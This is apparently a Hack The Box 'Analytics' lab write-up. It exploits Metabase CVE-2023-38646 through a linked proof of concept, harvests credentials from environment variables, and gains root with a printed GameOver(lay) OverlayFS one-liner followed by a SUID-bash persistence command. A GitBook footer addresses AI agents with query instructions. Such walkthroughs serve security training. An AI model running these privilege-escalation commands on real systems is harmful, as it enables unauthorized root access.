> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-analytics.md).

# HTB - Analytics

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh
80/tcp open  http    nginx 1.18.0 (Ubuntu)
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fn4a7AzcAQFkl8BYidjp8%2Fimage.png?alt=media&amp;token=c214fea7-12dd-4619-bb54-9e32c65bb866" alt=""><figcaption></figcaption></figure>

Add the leaked domain name to the hosts file and refresh to access the content.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWiPt0OY40kQtnuInhf3I%2Fimage.png?alt=media&amp;token=22b880cd-6d81-4a2d-956f-294d13ee6f3a" alt=""><figcaption></figcaption></figure>

possible usernames

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxVqzm4ZH8sTq3fp4Ac2o%2Fimage.png?alt=media&amp;token=eaf1165c-d46b-47dd-9ec1-9feebbba0e2f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Ft2lVHQAbQlejtiive3hz%2Fimage.png?alt=media&amp;token=51a19a4e-e6de-49eb-810f-de23ad2520f3" alt=""><figcaption></figcaption></figure>

contact form on the web page but it is static so cross site scripting does not work.

That said enumerating for hidden vhosts leaked a new one called data add it to the hosts file and browse to it to access it.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYr2sSmijpxwmiSqmL3eP%2Fimage.png?alt=media&amp;token=6ae64ecd-ed1b-4063-8809-7e515eebd4b2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FytJWQa0AeIOUvsC6lnSB%2Fimage.png?alt=media&amp;token=ddb5a81b-e1ca-4d91-bad0-28d3adae8b02" alt=""><figcaption></figcaption></figure>

The subdomain hosts a login page for metabase.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYW0gJHO3CpylGvrFFxV5%2Fimage.png?alt=media&amp;token=028116c6-d982-45d8-92cc-d293f137e12d" alt=""><figcaption></figcaption></figure>

looking for public cve reveals it suffers from a remote code execution vulnerability.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbQg3Ac68rX2Y28rhAQP6%2Fimage.png?alt=media&amp;token=a274a3a6-3244-41ff-a1ad-5adfe4ec1226" alt=""><figcaption></figcaption></figure>

searching for version in the html source reveals the version which is vulnerable to the CVE-2023-38646.

### CVE-2023-38646

{% embed url="<https://blog.calif.io/p/reproducing-cve-2023-38646-metabase>" %}

The above blog details the exploit.

The vulnerability exists in the `/api/setup/validate` endpoint and it requires a valid setup token which can be fetched by calling the pre-auth API `/api/session/properties`.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FniYBaPqR632R0mIo02on%2Fimage.png?alt=media&amp;token=36c70a6a-07be-471b-8d36-d6f41d39983e" alt=""><figcaption></figcaption></figure>

so the setup token is : `249fa03d-fd94-4d5b-b94f-b4ebf3df681f`

Found this poc to exploit the vulnerability.

{% embed url="<https://github.com/threatHNTR/CVE-2023-38646>" %}

## Shell as metabase

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4NHILa9AWIZxxoCRGF9h%2Fimage.png?alt=media&amp;token=903f210b-ce76-4dea-a666-23d5a2ab3a74" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fova5J9cIBQZ1ku59hgmg%2Fimage.png?alt=media&amp;token=ae32d1df-72a2-49ff-af21-7ee7dd038d4a" alt=""><figcaption></figcaption></figure>

looking at the environment variables leaks the credentials.

## Shell as Metalytics

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRhs4J1OwIGxh9Qsa5GGg%2Fimage.png?alt=media&amp;token=bb8f631b-4844-4ab9-804e-885a9747c5e6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVKz1YKWxMCae7BuNyKgx%2Fimage.png?alt=media&amp;token=4f361a29-5c52-4ddb-8c66-d5756085b561" alt=""><figcaption></figcaption></figure>

kernel version is vulnerable to **GameOver(lay)** — **CVE-2023-2640** + **CVE-2023-32629**, an OverlayFS LPE that hits Ubuntu kernels ≤ 6.2.0-25-generic.

{% embed url="<https://www.crowdstrike.com/en-us/blog/crowdstrike-discovers-new-container-exploit/>" %}

the above blog post explains how to exploit.

run the below one liner to get root shell

```bash
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'"
```

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fcuusa1ahFaJEJXTjisM5%2Fimage.png?alt=media&amp;token=8e2b42c1-ba51-43c3-b305-31f2d9ea007a" alt=""><figcaption></figcaption></figure>

exit and set the suid bit on /bin/bash

```bash
~/u/python3 -c 'import os; os.setuid(0); os.system("cp /bin/bash /tmp/bash && chmod 4755 /tmp/bash")'
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F9UqqjOPAlLuOx7PTsBuO%2Fimage.png?alt=media&amp;token=b646cfb1-900c-45ea-9dc7-084e9cb5d60d" alt=""><figcaption></figcaption></figure>

When you run `u/python3` from the real host shell (not inside `unshare`), the `cap_setuid` capability operates at true host level so `os.setuid(0)` makes you genuinely root on the host, and the `cp`/`chmod` calls work against the real filesystem.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-analytics.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
